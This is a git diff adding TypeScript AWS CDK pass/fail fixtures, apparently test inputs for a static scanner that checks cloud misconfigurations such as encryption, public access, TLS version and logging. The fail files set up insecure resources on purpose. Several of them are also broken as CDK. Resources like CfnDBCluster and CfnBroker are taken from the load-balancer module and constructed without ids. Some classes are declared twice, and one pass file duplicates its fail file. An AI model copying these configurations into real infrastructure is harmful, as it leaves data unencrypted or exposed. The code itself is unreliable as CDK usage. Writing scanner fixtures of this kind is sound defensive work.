diff --git a/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts
new file mode 100644
index 00000000000..b2245e3ee9b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayXrayStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnStage(this, {})
+        new elbv2.CfnStage(this, {tracingEnabled: false})
+    }
+}
+
+const app = new App();
+new APIGatewayXrayStack(app, 'APIGatewayXrayStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts
new file mode 100644
index 00000000000..0669da9aa33
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayXrayStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnStage(this, {tracingEnabled: true})
+    }
+}
+
+const app = new App();
+new APIGatewayXrayStack(app, 'APIGatewayXrayStack');
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
new file mode 100644
index 00000000000..51042e67b97
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
@@ -0,0 +1,13 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AmazonMQBrokerPublicAccessStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+        new elbv2.CfnBroker(this, {publiclyAccessible: true})
+    }
+}
+
+const app = new App();
+new AmazonMQBrokerPublicAccessStack(app, 'AmazonMQBrokerPublicAccessStack');
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
new file mode 100644
index 00000000000..e9da3de07b5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AmazonMQBrokerPublicAccessStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+        new elbv2.CfnBroker(this, {})
+        new elbv2.CfnBroker(this, {publiclyAccessible: false})
+    }
+}
+
+const app = new App();
+new AmazonMQBrokerPublicAccessStack(app, 'AmazonMQBrokerPublicAccessStack');
diff --git a/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts
new file mode 100644
index 00000000000..26b89d326ba
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration that does not enable field-level logging
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutLogs = new appsync.GraphqlApi(this, 'apiWithoutLogs', {
+  // other configuration details
+  logConfig: {
+    // Incorrect or missing fieldLogLevel configuration
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutLogs`.
diff --git a/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts
new file mode 100644
index 00000000000..a245d7c3e99
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts
@@ -0,0 +1,16 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration that does not enable field-level logging
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should not match the pattern as it includes a logConfig with FieldLogLevel
+const graphqlApiWithLogs = new appsync.GraphqlApi(this, 'apiWithLogs', {
+  // other configuration details
+  logConfig: {
+    fieldLogLevel: appsync.FieldLogLevel.ALL // This is the correct configuration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts b/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts
new file mode 100644
index 00000000000..035b0049e08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutRole = new appsync.GraphqlApi(this, 'apiWithoutRole', {
+  // other configuration details
+  logConfig: {
+    // log configuration details without role
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutRole`.
diff --git a/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts b/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts
new file mode 100644
index 00000000000..035b0049e08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutRole = new appsync.GraphqlApi(this, 'apiWithoutRole', {
+  // other configuration details
+  logConfig: {
+    // log configuration details without role
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutRole`.
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts
new file mode 100644
index 00000000000..a32f56aa756
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts
@@ -0,0 +1,11 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const workgroupWithoutEnforcement = new athena.CfnWorkGroup(this, 'workgroupWithoutEnforcement', {
+  // other configuration details
+  workGroupConfiguration: {
+    // Workgroup configuration details without enforceWorkGroupConfiguration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts
new file mode 100644
index 00000000000..698b7a4257e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// Example of a Workgroup configuration
+// FINDING
+const workgroupConfig: athena.CfnWorkGroup.WorkGroupConfigurationProperty = {
+  // Workgroup configuration details
+};
+
+
+const workgroupWithoutEnforcement2 = new athena.CfnWorkGroup(this, 'workgroupWithoutEnforcement', {
+  // other configuration details
+  workGroupConfiguration: workgroupConfig
+});
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts
new file mode 100644
index 00000000000..c0b0f9eb2a0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts
@@ -0,0 +1,18 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// Example of a Workgroup configuration
+// FINDING
+const workgroupConfig: athena.CfnWorkGroup.WorkGroupConfigurationProperty = {
+  enforceWorkGroupConfiguration: true
+};
+
+// This should not match the pattern as it includes enforceWorkGroupConfiguration set to true
+const workgroupWithEnforcement = new athena.CfnWorkGroup(this, 'workgroupWithEnforcement', {
+  // other configuration details
+  enforceWorkGroupConfiguration: true
+});
+
+
+// This should not match the pattern as it includes enforceWorkGroupConfiguration set to true
+const workgroupWithEnforcement2 = new athena.CfnWorkGroup(this, 'workgroupWithEnforcement', workgroupConfig);
diff --git a/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts b/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts
new file mode 100644
index 00000000000..fbd0347923c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AuroraEncryptionStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnDBCluster(this, {})
+        new elbv2.CfnDBCluster(this, {storageEncrypted: false})
+    }
+}
+
+const app = new App();
+new AuroraEncryptionStack(app, 'AuroraEncryptionStack');
diff --git a/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts b/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts
new file mode 100644
index 00000000000..41628436f10
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AuroraEncryptionStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnDBCluster(this, {storageEncrypted: true})
+    }
+}
+
+const app = new App();
+new AuroraEncryptionStack(app, 'AuroraEncryptionStack');
diff --git a/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts
new file mode 100644
index 00000000000..07807336181
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class BackupVaultEncryptedStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnBackupVault(this, {})
+        new elbv2.CfnBackupVault(this, {encryptionKeyArn: false})
+    }
+}
+
+const app = new App();
+new BackupVaultEncryptedStack(app, 'BackupVaultEncryptedStack');
diff --git a/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts
new file mode 100644
index 00000000000..3284ef95d11
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class BackupVaultEncryptedStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnBackupVault(this, {encryptionKeyArn: true})
+    }
+}
+
+const app = new App();
+new BackupVaultEncryptedStack(app, 'BackupVaultEncryptedStack');
diff --git a/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts b/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts
new file mode 100644
index 00000000000..01bd305911a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts
@@ -0,0 +1,20 @@
+// Import necessary AWS CDK packages
+import * as cloudfront from '@aws-cdk/aws-cloudfront';
+import { Construct } from '@aws-cdk/core';
+
+// Example of a ViewerCertificateProperty that does not specify TLS v1.2
+// FINDING
+const viewerCertificateConfig: cloudfront.CfnDistribution.ViewerCertificateProperty = {
+  // Viewer certificate configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const distributionWithoutTLSv12 = new cloudfront.CfnDistribution(new Construct(), 'distributionWithoutTLSv12', {
+  // other configuration details
+  viewerCertificate: {
+    // Incorrect or missing minimumProtocolVersion configuration
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `distributionWithoutTLSv12`.
diff --git a/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts b/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts
new file mode 100644
index 00000000000..a24db7f021e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts
@@ -0,0 +1,17 @@
+// Import necessary AWS CDK packages
+import * as cloudfront from '@aws-cdk/aws-cloudfront';
+import { Construct } from '@aws-cdk/core';
+
+// Example of a ViewerCertificateProperty that does not specify TLS v1.2
+// FINDING
+const viewerCertificateConfig: cloudfront.CfnDistribution.ViewerCertificateProperty = {
+  // Viewer certificate configuration details
+};
+
+// This should not match the pattern as it includes a ViewerCertificate with TLSv1.2
+const distributionWithTLSv12 = new cloudfront.CfnDistribution(new Construct(), 'distributionWithTLSv12', {
+  // other configuration details
+  viewerCertificate: {
+    minimumProtocolVersion: 'TLSv1.2' // This is the correct configuration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts
new file mode 100644
index 00000000000..4b00c22df68
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class CloudTrailLogValidationStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnTrail(this, {})
+        new elbv2.CfnTrail(this, {enableLogFileValidation: false})
+    }
+}
+
+const app = new App();
+new CloudTrailLogValidationStack(app, 'CloudTrailLogValidationStack');
diff --git a/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts
new file mode 100644
index 00000000000..596d72b0e16
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class CloudTrailLogValidationStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        new elbv2.CfnTrail(this, {enableLogFileValidation: true})
+    }
+}
+
+const app = new App();
+new CloudTrailLogValidationStack(app, 'CloudTrailLogValidationStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts
new file mode 100644
index 00000000000..79f42c57518
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts
@@ -0,0 +1,20 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    new logs.LogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Setting removal policy
+      retention: logs.RetentionDays.ONE_MONTH, // Set the retention policy as needed
+    });
+
+    // You can add other resources or configurations to the stack here
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts
new file mode 100644
index 00000000000..03c27935ec6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    new logs.LogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Setting removal policy
+      retention: logs.RetentionDays.ONE_MONTH, // Set the retention policy as needed
+      encryptionKey: new kms.Key(this, 'Key'),
+    });
+
+    // You can add other resources or configurations to the stack here
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts
new file mode 100644
index 00000000000..043bf2885dc
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts
@@ -0,0 +1,21 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating a CloudFormation LogGroup resource
+    const logGroup = new logs.CfnLogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      kmsKeyId: '1', // Specify the KMS key ID
+    });
+
+    // Optionally set removal policy
+    logGroup.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts
new file mode 100644
index 00000000000..78b5e892a5b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating a CloudFormation LogGroup resource
+    const logGroup = new logs.CfnLogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      retentionInDays: 30, // Set the retention policy as needed
+      kmsKeyId: '1', // Specify the KMS key ID
+    });
+
+    // Optionally set removal policy
+    logGroup.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts
new file mode 100644
index 00000000000..fbcf72be121
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts
@@ -0,0 +1,57 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as origins from 'aws-cdk-lib/aws-cloudfront-origins';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin1',
+          viewerProtocolPolicy: 'allow-all',
+        },
+        origins: [
+          {
+            id: 'myOrigin1',
+            domainName: 'my-bucket.s3.amazonaws.com',
+            s3OriginConfig: {},
+          },
+        ],
+        enabled: true,
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL, // Allow all protocols
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts
new file mode 100644
index 00000000000..95d4e863320
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts
@@ -0,0 +1,55 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as origins from 'aws-cdk-lib/aws-cloudfront-origins';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin1',
+          viewerProtocolPolicy: 'redirect-to-https',
+        },
+        origins: [
+          {
+            id: 'myOrigin1',
+            domainName: 'my-bucket.s3.amazonaws.com',
+            s3OriginConfig: {},
+          },
+        ],
+        enabled: true,
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.REDIRECT_TO_HTTPS, // Allow all protocols
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts
new file mode 100644
index 00000000000..08963977f26
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts
@@ -0,0 +1,72 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // S3 bucket for storing CloudFront access logs
+    const logBucket = new s3.Bucket(this, 'LogBucket');
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new cloudfront.Origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL,
+      },
+      enableLogging: false, // Enable access logging
+      logBucket: logBucket,
+      logFilePrefix: 'cf-access-logs/', // Optional: prefix for log file names
+    });
+
+    // Optionally grant CloudFront permission to write access logs to the S3 bucket
+    logBucket.grantWrite(distribution.logBucketDelivery);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // S3 bucket for storing CloudFront access logs
+    const logBucket = new s3.Bucket(this, 'LogBucket');
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new cloudfront.CfnDistribution.OriginProperty({
+      domainName: 'my-bucket.s3.amazonaws.com',
+      id: 'myOrigin',
+      s3OriginConfig: {},
+    });
+
+    // Creating a CloudFront distribution using the CfnDistribution construct
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin',
+          viewerProtocolPolicy: 'allow-all',
+        },
+        origins: [myOrigin],
+        enabled: true,
+      },
+    });
+
+    // Optionally grant CloudFront permission to write access logs to the S3 bucket
+    logBucket.grantWrite(distribution.logBucketDeliveryWrite);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts
new file mode 100644
index 00000000000..133c1e25ab2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts
@@ -0,0 +1,74 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // S3 bucket for storing CloudFront access logs
+    const logBucket = new s3.Bucket(this, 'LogBucket');
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new cloudfront.Origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL,
+      },
+      enableLogging: true, // Enable access logging
+      logBucket: logBucket,
+      logFilePrefix: 'cf-access-logs/', // Optional: prefix for log file names
+    });
+
+    // Optionally grant CloudFront permission to write access logs to the S3 bucket
+    logBucket.grantWrite(distribution.logBucketDelivery);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // S3 bucket for storing CloudFront access logs
+    const logBucket = new s3.Bucket(this, 'LogBucket');
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new cloudfront.CfnDistribution.OriginProperty({
+      domainName: 'my-bucket.s3.amazonaws.com',
+      id: 'myOrigin',
+      s3OriginConfig: {},
+    });
+
+    // Creating a CloudFront distribution using the CfnDistribution construct
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin',
+          viewerProtocolPolicy: 'allow-all',
+        },
+        origins: [myOrigin],
+        enabled: true,
+        logging: {
+          bucket: logBucket.bucketName,
+          prefix: 'cf-access-logs/', // Optional: prefix for log file names
+          includeCookies: false, // Optional: whether to include cookies in access logs
+        },
+      },
+    });
+
+    // Optionally grant CloudFront permission to write access logs to the S3 bucket
+    logBucket.grantWrite(distribution.logBucketDeliveryWrite);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
diff --git a/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts b/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts
new file mode 100644
index 00000000000..f514eb260da
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
